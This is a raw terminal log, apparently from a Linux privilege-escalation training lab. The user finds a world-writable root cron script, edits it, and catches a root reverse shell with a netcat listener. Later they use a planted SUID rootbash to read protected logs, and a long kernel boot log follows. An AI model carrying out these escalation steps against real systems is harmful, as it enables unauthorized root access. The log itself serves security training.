733user@debian:~/tools/mysql-udf$ cat /etc/crontab
734# /etc/crontab: system-wide crontab
735# Unlike any other crontab you don't have to run the `crontab'
736# command to install the new version when you edit this file
737# and files in /etc/cron.d. These files also have username fields,
738# that none of the other crontabs do.
739
740SHELL=/bin/sh
741PATH=/home/user:/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
742
743# m h dom mon dow user command
74417 * * * * root cd / && run-parts --report /etc/cron.hourly
74525 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
74647 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
74752 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
748#
749* * * * * root overwrite.sh
750* * * * * root /usr/local/bin/compress.sh
751
752user@debian:~/tools/mysql-udf$ locate overwrite.sh
753locate: warning: database `/var/cache/locate/locatedb' is more than 8 days old (actual age is 247.7 days)
754/usr/local/bin/overwrite.sh
755user@debian:~/tools/mysql-udf$ ls -l /usr/local/bin/overwrite.sh
756-rwxr--rw- 1 root staff 40 May 13 2017 /usr/local/bin/overwrite.sh
757user@debian:~/tools/mysql-udf$ cd /usr/local/bin/
758user@debian:/usr/local/bin$ ls
759compress.sh overwrite.sh suid-env suid-env2 suid-so
760user@debian:/usr/local/bin$ cat overwrite.sh
761#!/bin/bash
762
763echo `date` > /tmp/useless
764user@debian:/usr/local/bin$ nano overwrite.sh
765user@debian:/usr/local/bin$ nc -nvlp 4444
766listening on [any] 4444 ...
767connect to [10.10.170.166] from (UNKNOWN) [10.10.170.166] 37728
768allexport off
769braceexpand on
770emacs on
771errexit off
772errtrace off
773functrace off
774hashall on
775histexpand on
776history on
777ignoreeof off
778interactive-comments on
779keyword off
780monitor off
781noclobber off
782noexec off
783noglob off
784nolog off
785notify off
786nounset off
787onecmd off
788physical off
789pipefail off
790posix off
791privileged off
792verbose off
793vi off
794xtrace off
795id
796uid=0(root) gid=0(root) groups=0(root)
797ls
798cat /etc/passwd
799root:x:0:0:root:/root:/bin/bash
800daemon:x:1:1:daemon:/usr/sbin:/bin/sh
801bin:x:2:2:bin:/bin:/bin/sh
802sys:x:3:3:sys:/dev:/bin/sh
803sync:x:4:65534:sync:/bin:/bin/sync
804games:x:5:60:games:/usr/games:/bin/sh
805man:x:6:12:man:/var/cache/man:/bin/sh
806lp:x:7:7:lp:/var/spool/lpd:/bin/sh
807mail:x:8:8:mail:/var/mail:/bin/sh
808news:x:9:9:news:/var/spool/news:/bin/sh
809uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
810proxy:x:13:13:proxy:/bin:/bin/sh
811www-data:x:33:33:www-data:/var/www:/bin/sh
812backup:x:34:34:backup:/var/backups:/bin/sh
813list:x:38:38:Mailing List Manager:/var/list:/bin/sh
814irc:x:39:39:ircd:/var/run/ircd:/bin/sh
815gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
816nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
817libuuid:x:100:101::/var/lib/libuuid:/bin/sh
818Debian-exim:x:101:103::/var/spool/exim4:/bin/false
819sshd:x:102:65534::/var/run/sshd:/usr/sbin/nologin
820user:x:1000:1000:user,,,:/home/user:/bin/bash
821statd:x:103:65534::/var/lib/nfs:/bin/false
822mysql:x:104:106:MySQL Server,,,:/var/lib/mysql:/bin/false
823bmillakid:x:1001:1001::/home/bmillakid:/bin/sh
824user@debian:/usr/local/bin$
825
826login as: user
827user@10.10.170.166's password:
828Linux debian 2.6.32-5-amd64 #1 SMP Tue May 13 16:34:35 UTC 2014 x86_64
829
830The programs included with the Debian GNU/Linux system are free software;
831the exact distribution terms for each program are described in the
832individual files in /usr/share/doc/*/copyright.
833
834Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
835permitted by applicable law.
836Last login: Sun Jan 17 21:14:02 2021 from ip-10-9-252-16.eu-west-1.compute.internal
837user@debian:~$ dmesg | grep /var/log/messages > l33t.txt
838user@debian:~$ cat l33t.txt
839user@debian:~$ ls
840l33t.txt myvpn.ovpn tools
841user@debian:~$ cat l33t.txt
842user@debian:~$ ls
843l33t.txt myvpn.ovpn tools
844user@debian:~$ dmesg | grep /var/log/messages
845user@debian:~$ tail -f /var/log/messages
846tail: cannot open `/var/log/messages' for reading: Permission denied
847user@debian:~$ tail -f /var/log/messages | less
848user@debian:~$ tail -f /var/log/auth.log
849tail: cannot open `/var/log/auth.log' for reading: Permission denied
850user@debian:~$ /tmp/rootbash -p
851rootbash-4.1# tail -f /var/log/messages
852Jan 17 19:55:44 debian kernel: [ 116.943577] RPC: Registered tcp transport module.
853Jan 17 19:55:44 debian kernel: [ 116.943578] RPC: Registered tcp NFSv4.1 backchannel transport module.
854Jan 17 19:55:44 debian kernel: [ 117.026375] Slow work thread pool: Starting up
855Jan 17 19:55:44 debian kernel: [ 117.026397] Slow work thread pool: Ready
856Jan 17 19:55:44 debian kernel: [ 117.026419] FS-Cache: Loaded
857Jan 17 19:55:44 debian kernel: [ 117.201005] FS-Cache: Netfs 'nfs' registered for caching
858Jan 17 19:55:44 debian kernel: [ 117.326456] Installing knfsd (copyright (C) 1996 okir@monad.swb.de).
859Jan 17 19:55:48 debian kernel: [ 130.271583] svc: failed to register lockdv1 RPC service (errno 97).
860Jan 17 19:55:48 debian kernel: [ 130.272088] NFSD: Using /var/lib/nfs/v4recovery as the NFSv4 state recovery directory
861Jan 17 19:55:48 debian kernel: [ 130.272101] NFSD: starting 90-second grace period
867ls
868^C
869rootbash-4.1# cat /var/log/messages
870May 15 06:25:03 debian rsyslogd: [origin software="rsyslogd" swVersion="4.6.4" x-pid="1345" x-info="http://www.rsyslog.com"] rsyslogd was HUPed, type 'lightweight'.
871May 15 11:32:35 debian kernel: imklog 4.6.4, log source = /proc/kmsg started.
872May 15 11:32:35 debian rsyslogd: [origin software="rsyslogd" swVersion="4.6.4" x-pid="1418" x-info="http://www.rsyslog.com"] (re)start
873May 15 11:32:35 debian kernel: [ 0.000000] Initializing cgroup subsys cpuset
874May 15 11:32:35 debian kernel: [ 0.000000] Initializing cgroup subsys cpu
875May 15 11:32:35 debian kernel: [ 0.000000] Linux version 2.6.32-5-amd64 (Debian 2.6.32-48squeeze6) (jmm@debian.org) (gcc version 4.3.5 (Debian 4.3.5-4) ) #1 SMP Tue May 13 16:34:35 UTC 2014
876May 15 11:32:35 debian kernel: [ 0.000000] Command line: BOOT_IMAGE=/boot/vmlinuz-2.6.32-5-amd64 root=UUID=be5bb36f-7bb4-4900-b459-196278f714b6 ro quiet console=ttyS0
877May 15 11:32:35 debian kernel: [ 0.000000] KERNEL supported cpus:
878May 15 11:32:35 debian kernel: [ 0.000000] Intel GenuineIntel
879May 15 11:32:35 debian kernel: [ 0.000000] AMD AuthenticAMD
880May 15 11:32:35 debian kernel: [ 0.000000] Centaur CentaurHauls
881May 15 11:32:35 debian kernel: [ 0.000000] BIOS-provided physical RAM map:
882May 15 11:32:35 debian kernel: [ 0.000000] BIOS-e820: 0000000000000000 - 000000000009e000 (usable)
883May 15 11:32:35 debian kernel: [ 0.000000] BIOS-e820: 000000000009e000 - 00000000000a0000 (reserved)
884May 15 11:32:35 debian kernel: [ 0.000000] BIOS-e820: 00000000000e0000 - 0000000000100000 (reserved)
885May 15 11:32:35 debian kernel: [ 0.000000] BIOS-e820: 0000000000100000 - 00000000f0000000 (usable)
886May 15 11:32:35 debian kernel: [ 0.000000] BIOS-e820: 00000000fc000000 - 0000000100000000 (reserved)
887May 15 11:32:35 debian kernel: [ 0.000000] BIOS-e820: 0000000100000000 - 00000003d0000000 (usable)
888May 15 11:32:35 debian kernel: [ 0.000000] DMI 2.7 present.
889May 15 11:32:35 debian kernel: [ 0.000000] last_pfn = 0x3d0000 max_arch_pfn = 0x400000000
890May 15 11:32:35 debian kernel: [ 0.000000] x86 PAT enabled: cpu 0, old 0x7040600070406, new 0x7010600070106
891May 15 11:32:35 debian kernel: [ 0.000000] last_pfn = 0xf0000 max_arch_pfn = 0x400000000
892May 15 11:32:35 debian kernel: [ 0.000000] init_memory_mapping: 0000000000000000-00000000f0000000
893May 15 11:32:35 debian kernel: [ 0.000000] init_memory_mapping: 0000000100000000-00000003d0000000
894May 15 11:32:35 debian kernel: [ 0.000000] RAMDISK: 37709000 - 37fefa59
895May 15 11:32:35 debian kernel: [ 0.000000] ACPI: RSDP 00000000000ea020 00024 (v02 Xen)
896May 15 11:32:35 debian kernel: [ 0.000000] ACPI: XSDT 00000000fc00e2a0 00054 (v01 Xen HVM 00000000 HVML 00000000)
897May 15 11:32:35 debian kernel: [ 0.000000] ACPI: FACP 00000000fc00df60 000F4 (v04 Xen HVM 00000000 HVML 00000000)
898May 15 11:32:35 debian kernel: [ 0.000000] ACPI: DSDT 00000000fc0021c0 0BD19 (v02 Xen HVM 00000000 INTL 20090123)
899May 15 11:32:35 debian kernel: [ 0.000000] ACPI: FACS 00000000fc002180 00040
900May 15 11:32:35 debian kernel: [ 0.000000] ACPI: APIC 00000000fc00e060 000D8 (v02 Xen HVM 00000000 HVML 00000000)
901May 15 11:32:35 debian kernel: [ 0.000000] ACPI: HPET 00000000fc00e1b0 00038 (v01 Xen HVM 00000000 HVML 00000000)
902May 15 11:32:35 debian kernel: [ 0.000000] ACPI: WAET 00000000fc00e1f0 00028 (v01 Xen HVM 00000000 HVML 00000000)
903May 15 11:32:35 debian kernel: [ 0.000000] ACPI: SSDT 00000000fc00e220 00031 (v02 Xen HVM 00000000 INTL 20090123)
904May 15 11:32:35 debian kernel: [ 0.000000] ACPI: SSDT 00000000fc00e260 00033 (v02 Xen HVM 00000000 INTL 20090123)
905May 15 11:32:35 debian kernel: [ 0.000000] No NUMA configuration found
906May 15 11:32:35 debian kernel: [ 0.000000] Faking a node at 0000000000000000-00000003d0000000
907May 15 11:32:35 debian kernel: [ 0.000000] Bootmem setup node 0 0000000000000000-00000003d0000000
908May 15 11:32:35 debian kernel: [ 0.000000] NODE_DATA [0000000000017000 - 000000000001efff]
909May 15 11:32:35 debian kernel: [ 0.000000] bootmap [000000000001f000 - 0000000000098fff] pages 7a
910May 15 11:32:35 debian kernel: [ 0.000000] (8 early reservations) ==> bootmem [0000000000 - 03d0000000]
911May 15 11:32:35 debian kernel: [ 0.000000] #0 [0000000000 - 0000001000] BIOS data page ==> [0000000000 - 0000001000]
912May 15 11:32:35 debian kernel: [ 0.000000] #1 [0000006000 - 0000008000] TRAMPOLINE ==> [0000006000 - 0000008000]
913May 15 11:32:35 debian kernel: [ 0.000000] #2 [0001000000 - 00016d7584] TEXT DATA BSS ==> [0001000000 - 00016d7584]
914May 15 11:32:35 debian kernel: [ 0.000000] #3 [0037709000 - 0037fefa59] RAMDISK ==> [0037709000 - 0037fefa59]
915May 15 11:32:35 debian kernel: [ 0.000000] #4 [000009e000 - 0000100000] BIOS reserved ==> [000009e000 - 0000100000]
916May 15 11:32:35 debian kernel: [ 0.000000] #5 [00016d8000 - 00016d80c8] BRK ==> [00016d8000 - 00016d80c8]
917May 15 11:32:35 debian kernel: [ 0.000000] #6 [0000008000 - 000000b000] PGTABLE ==> [0000008000 - 000000b000]
918May 15 11:32:35 debian kernel: [ 0.000000] #7 [000000b000 - 0000017000] PGTABLE ==> [000000b000 - 0000017000]
919May 15 11:32:35 debian kernel: [ 0.000000] found SMP MP-table at [ffff8800000fbc50] fbc50
920May 15 11:32:35 debian kernel: [ 0.000000] Zone PFN ranges:
921May 15 11:32:35 debian kernel: [ 0.000000] DMA 0x00000000 -> 0x00001000
922May 15 11:32:35 debian kernel: [ 0.000000] DMA32 0x00001000 -> 0x00100000
923May 15 11:32:35 debian kernel: [ 0.000000] Normal 0x00100000 -> 0x003d0000
924May 15 11:32:35 debian kernel: [ 0.000000] Movable zone start PFN for each node
925May 15 11:32:35 debian kernel: [ 0.000000] early_node_map[3] active PFN ranges
926May 15 11:32:35 debian kernel: [ 0.000000] 0: 0x00000000 -> 0x0000009e
927May 15 11:32:35 debian kernel: [ 0.000000] 0: 0x00000100 -> 0x000f0000
928May 15 11:32:35 debian kernel: [ 0.000000] 0: 0x00100000 -> 0x003d0000
929May 15 11:32:35 debian kernel: [ 0.000000] ACPI: PM-Timer IO Port: 0xb008
930May 15 11:32:35 debian kernel: [ 0.000000] ACPI: LAPIC (acpi_id[0x00] lapic_id[0x00] enabled)
931May 15 11:32:35 debian kernel: [ 0.000000] ACPI: LAPIC (acpi_id[0x01] lapic_id[0x02] enabled)
932May 15 11:32:35 debian kernel: [ 0.000000] ACPI: LAPIC (acpi_id[0x02] lapic_id[0x01] enabled)
933May 15 11:32:35 debian kernel: [ 0.000000] ACPI: LAPIC (acpi_id[0x03] lapic_id[0x03] enabled)
934May 15 11:32:35 debian kernel: [ 0.000000] ACPI: LAPIC (acpi_id[0x04] lapic_id[0x00] disabled)
935May 15 11:32:35 debian kernel: [ 0.000000] ACPI: LAPIC (acpi_id[0x05] lapic_id[0x00] disabled)
936May 15 11:32:35 debian kernel: [ 0.000000] ACPI: LAPIC (acpi_id[0x06] lapic_id[0x00] disabled)
937May 15 11:32:35 debian kernel: [ 0.000000] ACPI: LAPIC (acpi_id[0x07] lapic_id[0x00] disabled)
938May 15 11:32:35 debian kernel: [ 0.000000] ACPI: LAPIC (acpi_id[0x08] lapic_id[0x00] disabled)
939May 15 11:32:35 debian kernel: [ 0.000000] ACPI: LAPIC (acpi_id[0x09] lapic_id[0x00] disabled)
940May 15 11:32:35 debian kernel: [ 0.000000] ACPI: LAPIC (acpi_id[0x0a] lapic_id[0x00] disabled)
941May 15 11:32:35 debian kernel: [ 0.000000] ACPI: LAPIC (acpi_id[0x0b] lapic_id[0x00] disabled)
942May 15 11:32:35 debian kernel: [ 0.000000] ACPI: LAPIC (acpi_id[0x0c] lapic_id[0x00] disabled)
943May 15 11:32:35 debian kernel: [ 0.000000] ACPI: LAPIC (acpi_id[0x0d] lapic_id[0x00] disabled)
944May 15 11:32:35 debian kernel: [ 0.000000] ACPI: LAPIC (acpi_id[0x0e] lapic_id[0x00] disabled)
945May 15 11:32:35 debian kernel: [ 0.000000] ACPI: IOAPIC (id[0x01] address[0xfec00000] gsi_base[0])
946May 15 11:32:35 debian kernel: [ 0.000000] IOAPIC[0]: apic_id 1, version 17, address 0xfec00000, GSI 0-47
947May 15 11:32:35 debian kernel: [ 0.000000] ACPI: INT_SRC_OVR (bus 0 bus_irq 0 global_irq 2 dfl dfl)
948May 15 11:32:35 debian kernel: [ 0.000000] ACPI: INT_SRC_OVR (bus 0 bus_irq 5 global_irq 5 low level)
949May 15 11:32:35 debian kernel: [ 0.000000] ACPI: INT_SRC_OVR (bus 0 bus_irq 10 global_irq 10 low level)
950May 15 11:32:35 debian kernel: [ 0.000000] ACPI: INT_SRC_OVR (bus 0 bus_irq 11 global_irq 11 low level)
951May 15 11:32:35 debian kernel: [ 0.000000] Using ACPI (MADT) for SMP configuration information
952May 15 11:32:35 debian kernel: [ 0.000000] ACPI: HPET id: 0x8086a201 base: 0xfed00000
953May 15 11:32:35 debian kernel: [ 0.000000] SMP: Allowing 15 CPUs, 11 hotplug CPUs
954May 15 11:32:35 debian kernel: [ 0.000000] Xen version 4.2.
955May 15 11:32:35 debian kernel: [ 0.000000] Netfront and the Xen platform PCI driver have been compiled for this kernel: unplug emulated NICs.
956May 15 11:32:35 debian kernel: [ 0.000000] Blkfront and the Xen platform PCI driver have been compiled for this kernel: unplug emulated disks.
957May 15 11:32:35 debian kernel: [ 0.000000] You might have to change the root device
958May 15 11:32:35 debian kernel: [ 0.000000] from /dev/hd[a-d] to /dev/xvd[a-d]
959May 15 11:32:35 debian kernel: [ 0.000000] in your root= kernel command line option
960May 15 11:32:35 debian kernel: [ 0.000000] PM: Registered nosave memory: 000000000009e000 - 00000000000a0000
961May 15 11:32:35 debian kernel: [ 0.000000] PM: Registered nosave memory: 00000000000a0000 - 00000000000e0000
962May 15 11:32:35 debian kernel: [ 0.000000] PM: Registered nosave memory: 00000000000e0000 - 0000000000100000
963May 15 11:32:35 debian kernel: [ 0.000000] PM: Registered nosave memory: 00000000f0000000 - 00000000fc000000
964May 15 11:32:35 debian kernel: [ 0.000000] PM: Registered nosave memory: 00000000fc000000 - 0000000100000000
965May 15 11:32:35 debian kernel: [ 0.000000] Allocating PCI resources starting at f0000000 (gap: f0000000:c000000)
966May 15 11:32:35 debian kernel: [ 0.000000] Booting paravirtualized kernel on Xen
967May 15 11:32:35 debian kernel: [ 0.000000] NR_CPUS:512 nr_cpumask_bits:512 nr_cpu_ids:15 nr_node_ids:1
968May 15 11:32:35 debian kernel: [ 0.000000] PERCPU: Embedded 30 pages/cpu @ffff88000ee00000 s90392 r8192 d24296 u131072
969May 15 11:32:35 debian kernel: [ 0.000000] pcpu-alloc: s90392 r8192 d24296 u131072 alloc=1*2097152
970May 15 11:32:35 debian kernel: [ 0.000000] pcpu-alloc: [0] 00 01 02 03 04 05 06 07 08 09 10 11 12 13 14 --
971May 15 11:32:35 debian kernel: [ 0.000000] Built 1 zonelists in Zone order, mobility grouping on. Total pages: 3877290
972May 15 11:32:35 debian kernel: [ 0.000000] Policy zone: Normal
973May 15 11:32:35 debian kernel: [ 0.000000] Kernel command line: BOOT_IMAGE=/boot/vmlinuz-2.6.32-5-amd64 root=UUID=be5bb36f-7bb4-4900-b459-196278f714b6 ro quiet console=ttyS0
974May 15 11:32:35 debian kernel: [ 0.000000] PID hash table entries: 4096 (order: 3, 32768 bytes)
975May 15 11:32:35 debian kernel: [ 0.000000] Initializing CPU#0
976May 15 11:32:35 debian kernel: [ 0.000000] xsave/xrstor: enabled xstate_bv 0x7, cntxt size 0x340
977May 15 11:32:35 debian kernel: [ 0.000000] Checking aperture...
978May 15 11:32:35 debian kernel: [ 0.000000] No AGP bridge found
979May 15 11:32:35 debian kernel: [ 0.000000] PCI-DMA: Using software bounce buffering for IO (SWIOTLB)
980May 15 11:32:35 debian kernel: [ 0.000000] Placing 64MB software IO TLB between ffff88000efde000 - ffff880012fde000
981May 15 11:32:35 debian kernel: [ 0.000000] software IO TLB at phys 0xefde000 - 0x12fde000
982May 15 11:32:35 debian kernel: [ 0.000000] Memory: 15426784k/15990784k available (3087k kernel code, 262536k absent, 301464k reserved, 2036k data, 592k init)
983May 15 11:32:35 debian kernel: [ 0.000000] SLUB: Genslabs=14, HWalign=64, Order=0-3, MinObjects=0, CPUs=15, Nodes=1
984May 15 11:32:35 debian kernel: [ 0.000000] Hierarchical RCU implementation.
985May 15 11:32:35 debian kernel: [ 0.000000] NR_IRQS:4352 nr_irqs:936
986May 15 11:32:35 debian kernel: [ 0.000000] Xen HVM callback vector for event delivery is enabled
987May 15 11:32:35 debian kernel: [ 0.000000] Console: colour VGA+ 80x25
988May 15 11:32:35 debian kernel: [ 0.000000] console [ttyS0] enabled
989May 15 11:32:35 debian kernel: [ 0.000000] Detected 2500.068 MHz processor.
990May 15 11:32:35 debian kernel: [ 0.008000] Calibrating delay loop (skipped), value calculated using timer frequency.. 5000.13 BogoMIPS (lpj=10000272)
991May 15 11:32:35 debian kernel: [ 0.008000] Security Framework initialized
992May 15 11:32:35 debian kernel: [ 0.008000] SELinux: Disabled at boot.
993May 15 11:32:35 debian kernel: [ 0.008000] Dentry cache hash table entries: 2097152 (order: 12, 16777216 bytes)
994May 15 11:32:35 debian kernel: [ 0.008000] Inode-cache hash table entries: 1048576 (order: 11, 8388608 bytes)
995May 15 11:32:35 debian kernel: [ 0.008000] Mount-cache hash table entries: 256
996May 15 11:32:35 debian kernel: [ 0.008000] Initializing cgroup subsys ns
997May 15 11:32:35 debian kernel: [ 0.008000] Initializing cgroup subsys cpuacct
998May 15 11:32:35 debian kernel: [ 0.008000] Initializing cgroup subsys devices
999May 15 11:32:35 debian kernel: [ 0.008000] Initializing cgroup subsys freezer
1000May 15 11:32:35 debian kernel: [ 0.008000] Initializing cgroup subsys net_cls
1001May 15 11:32:35 debian kernel: [ 0.008000] CPU: Physical Processor ID: 0
1002May 15 11:32:35 debian kernel: [ 0.008000] CPU: L1 I cache: 32K, L1 D cache: 32K
1003May 15 11:32:35 debian kernel: [ 0.008000] CPU: L2 cache: 256K
1004May 15 11:32:35 debian kernel: [ 0.008000] CPU: L3 cache: 25600K
1005May 15 11:32:35 debian kernel: [ 0.008000] CPU 0/0x0 -> Node 0
1006May 15 11:32:35 debian kernel: [ 0.008000] mce: CPU supports 2 MCE banks
1007May 15 11:32:35 debian kernel: [ 0.008000] Performance Events: unsupported p6 CPU model 62 no PMU driver, software events only.
1008May 15 11:32:35 debian kernel: [ 0.009289] ACPI: Core revision 20090903
1009May 15 11:32:35 debian kernel: [ 0.012133] Not enabling x2apic, Intr-remapping init failed.
1010May 15 11:32:35 debian kernel: [ 0.012135] Setting APIC routing to physical flat
1011May 15 11:32:35 debian kernel: [ 0.014214] ..TIMER: vector=0x30 apic1=0 pin1=2 apic2=0 pin2=0
1012May 15 11:32:35 debian kernel: [ 0.053966] CPU0: Intel(R) Xeon(R) CPU E5-2670 v2 @ 2.50GHz stepping 04
1013May 15 11:32:35 debian kernel: [ 0.053982] installing Xen timer for CPU 0
1014May 15 11:32:35 debian kernel: [ 0.054162] Booting processor 1 APIC 0x2 ip 0x6000
1015May 15 11:32:35 debian kernel: [ 0.008000] Initializing CPU#1
1016May 15 11:32:35 debian kernel: [ 0.008000] CPU: Physical Processor ID: 0
1017May 15 11:32:35 debian kernel: [ 0.008000] CPU: L1 I cache: 32K, L1 D cache: 32K
1018May 15 11:32:35 debian kernel: [ 0.008000] CPU: L2 cache: 256K
1019May 15 11:32:35 debian kernel: [ 0.008000] CPU: L3 cache: 25600K
1020May 15 11:32:35 debian kernel: [ 0.008000] CPU 1/0x2 -> Node 0
1021May 15 11:32:35 debian kernel: [ 0.140804] CPU1: Intel(R) Xeon(R) CPU E5-2670 v2 @ 2.50GHz stepping 04
1022May 15 11:32:35 debian kernel: [ 0.140859] checking TSC synchronization [CPU#0 -> CPU#1]: passed.
1023May 15 11:32:35 debian kernel: [ 0.144005] installing Xen timer for CPU 1
1024May 15 11:32:35 debian kernel: [ 0.144084] Booting processor 2 APIC 0x1 ip 0x6000
1025May 15 11:32:35 debian kernel: [ 0.008000] Initializing CPU#2
1026May 15 11:32:35 debian kernel: [ 0.008000] CPU: Physical Processor ID: 0
1027May 15 11:32:35 debian kernel: [ 0.008000] CPU: L1 I cache: 32K, L1 D cache: 32K
1028May 15 11:32:35 debian kernel: [ 0.008000] CPU: L2 cache: 256K
1029May 15 11:32:35 debian kernel: [ 0.008000] CPU: L3 cache: 25600K
1030May 15 11:32:35 debian kernel: [ 0.008000] CPU 2/0x1 -> Node 0
1031May 15 11:32:35 debian kernel: [ 0.232868] CPU2: Intel(R) Xeon(R) CPU E5-2670 v2 @ 2.50GHz stepping 04
1032May 15 11:32:35 debian kernel: [ 0.232929] checking TSC synchronization [CPU#0 -> CPU#2]: passed.
1033May 15 11:32:35 debian kernel: [ 0.236007] installing Xen timer for CPU 2
1034May 15 11:32:35 debian kernel: [ 0.236108] Booting processor 3 APIC 0x3 ip 0x6000
1035May 15 11:32:35 debian kernel: [ 0.008000] Initializing CPU#3
1036May 15 11:32:35 debian kernel: [ 0.008000] CPU: Physical Processor ID: 0
1037May 15 11:32:35 debian kernel: [ 0.008000] CPU: L1 I cache: 32K, L1 D cache: 32K
1038May 15 11:32:35 debian kernel: [ 0.008000] CPU: L2 cache: 256K
1039May 15 11:32:35 debian kernel: [ 0.008000] CPU: L3 cache: 25600K
1040May 15 11:32:35 debian kernel: [ 0.008000] CPU 3/0x3 -> Node 0
1041May 15 11:32:35 debian kernel: [ 0.324780] CPU3: Intel(R) Xeon(R) CPU E5-2670 v2 @ 2.50GHz stepping 04
1042May 15 11:32:35 debian kernel: [ 0.324850] checking TSC synchronization [CPU#0 -> CPU#3]: passed.
1043May 15 11:32:35 debian kernel: [ 0.328005] installing Xen timer for CPU 3
1044May 15 11:32:35 debian kernel: [ 0.328025] Brought up 4 CPUs
1045May 15 11:32:35 debian kernel: [ 0.328027] Total of 4 processors activated (20196.33 BogoMIPS).
1046May 15 11:32:35 debian kernel: [ 0.328773] devtmpfs: initialized
1047May 15 11:32:35 debian kernel: [ 0.332061] regulator: core version 0.5
1048May 15 11:32:35 debian kernel: [ 0.332072] NET: Registered protocol family 16
1049May 15 11:32:35 debian kernel: [ 0.332156] ACPI: bus type pci registered
1050May 15 11:32:35 debian kernel: [ 0.332387] PCI: Using configuration type 1 for base access
1051May 15 11:32:35 debian kernel: [ 0.332873] bio: create slab <bio-0> at 0
1052May 15 11:32:35 debian kernel: [ 0.379117] ACPI: Interpreter enabled
1053May 15 11:32:35 debian kernel: [ 0.379119] ACPI: (supports S0 S3 S4 S5)
1054May 15 11:32:35 debian kernel: [ 0.379133] ACPI: Using IOAPIC for interrupt routing
1055May 15 11:32:35 debian kernel: [ 0.457794] ACPI: No dock devices found.
1056May 15 11:32:35 debian kernel: [ 0.457956] ACPI: PCI Root Bridge [PCI0] (0000:00)
1057May 15 11:32:35 debian kernel: [ 0.462736] * Found PM-Timer Bug on the chipset. Due to workarounds for a bug,
1058May 15 11:32:35 debian kernel: [ 0.462737] * this clock source is slow. Consider trying other clock sources
1059May 15 11:32:35 debian kernel: [ 0.463902] pci 0000:00:01.3: quirk: region b000-b03f claimed by PIIX4 ACPI
1060May 15 11:32:35 debian kernel: [ 0.699319] ACPI: PCI Interrupt Link [LNKA] (IRQs *5 10 11)
1061May 15 11:32:35 debian kernel: [ 0.699698] ACPI: PCI Interrupt Link [LNKB] (IRQs 5 *10 11)
1062May 15 11:32:35 debian kernel: [ 0.700019] ACPI: PCI Interrupt Link [LNKC] (IRQs 5 10 *11)
1063May 15 11:32:35 debian kernel: [ 0.700380] ACPI: PCI Interrupt Link [LNKD] (IRQs *5 10 11)
1064May 15 11:32:35 debian kernel: [ 0.700653] vgaarb: device added: PCI:0000:00:02.0,decodes=io+mem,owns=io+mem,locks=none
1065May 15 11:32:35 debian kernel: [ 0.700655] vgaarb: loaded
1066May 15 11:32:35 debian kernel: [ 0.700693] PCI: Using ACPI for IRQ routing
1067May 15 11:32:35 debian kernel: [ 0.700693] HPET: 3 timers in total, 0 timers will be used for per-cpu timer
1068May 15 11:32:35 debian kernel: [ 0.700693] hpet0: at MMIO 0xfed00000, IRQs 2, 8, 0
1069May 15 11:32:35 debian kernel: [ 0.700693] hpet0: 3 comparators, 64-bit 62.500000 MHz counter
1070May 15 11:32:35 debian kernel: [ 0.708028] Switching to clocksource xen
1071May 15 11:32:35 debian kernel: [ 0.709101] pnp: PnP ACPI init
1072May 15 11:32:35 debian kernel: [ 0.709113] ACPI: bus type pnp registered
1073May 15 11:32:35 debian kernel: [ 0.747539] pnp: PnP ACPI: found 12 devices
1074May 15 11:32:35 debian kernel: [ 0.747541] ACPI: ACPI bus type pnp unregistered
1075May 15 11:32:35 debian kernel: [ 0.747551] system 00:00: iomem range 0x0-0x9ffff could not be reserved
1076May 15 11:32:35 debian kernel: [ 0.747557] system 00:03: ioport range 0x8a0-0x8a3 has been reserved
1077May 15 11:32:35 debian kernel: [ 0.747558] system 00:03: ioport range 0xcc0-0xccf has been reserved
1078May 15 11:32:35 debian kernel: [ 0.747560] system 00:03: ioport range 0x4d0-0x4d1 has been reserved
1079May 15 11:32:35 debian kernel: [ 0.747566] system 00:0b: ioport range 0x10c0-0x1141 has been reserved
1080May 15 11:32:35 debian kernel: [ 0.747568] system 00:0b: ioport range 0xb044-0xb047 has been reserved
1081May 15 11:32:35 debian kernel: [ 0.752641] NET: Registered protocol family 2
1082May 15 11:32:35 debian kernel: [ 0.752920] IP route cache hash table entries: 524288 (order: 10, 4194304 bytes)
1083May 15 11:32:35 debian kernel: [ 0.754409] TCP established hash table entries: 524288 (order: 11, 8388608 bytes)
1084May 15 11:32:35 debian kernel: [ 0.755645] TCP bind hash table entries: 65536 (order: 8, 1048576 bytes)
1085May 15 11:32:35 debian kernel: [ 0.755800] TCP: Hash tables configured (established 524288 bind 65536)
1086May 15 11:32:35 debian kernel: [ 0.755801] TCP reno registered
1087May 15 11:32:35 debian kernel: [ 0.755887] NET: Registered protocol family 1
1088May 15 11:32:35 debian kernel: [ 0.755899] pci 0000:00:00.0: Limiting direct PCI/PCI transfers
1089May 15 11:32:35 debian kernel: [ 0.755960] pci 0000:00:01.0: PIIX3: Enabling Passive Release
1090May 15 11:32:35 debian kernel: [ 0.756004] pci 0000:00:01.0: Activating ISA DMA hang workarounds
1091May 15 11:32:35 debian kernel: [ 0.756087] Unpacking initramfs...
1092May 15 11:32:35 debian kernel: [ 0.897823] Freeing initrd memory: 9114k freed
1093May 15 11:32:35 debian kernel: [ 0.900160] audit: initializing netlink socket (disabled)
1094May 15 11:32:35 debian kernel: [ 0.900169] type=2000 audit(1589556748.331:1): initialized
1095May 15 11:32:35 debian kernel: [ 0.903195] HugeTLB registered 2 MB page size, pre-allocated 0 pages
1096May 15 11:32:35 debian kernel: [ 0.904442] VFS: Disk quotas dquot_6.5.2
1097May 15 11:32:35 debian kernel: [ 0.904488] Dquot-cache hash table entries: 512 (order 0, 4096 bytes)
1098May 15 11:32:35 debian kernel: [ 0.904546] msgmni has been set to 30148
1099May 15 11:32:35 debian kernel: [ 0.905183] alg: No test for stdrng (krng)
1100May 15 11:32:35 debian kernel: [ 0.905239] Block layer SCSI generic (bsg) driver version 0.4 loaded (major 253)
1101May 15 11:32:35 debian kernel: [ 0.905241] io scheduler noop registered
1102May 15 11:32:35 debian kernel: [ 0.905242] io scheduler anticipatory registered
1103May 15 11:32:35 debian kernel: [ 0.905243] io scheduler deadline registered
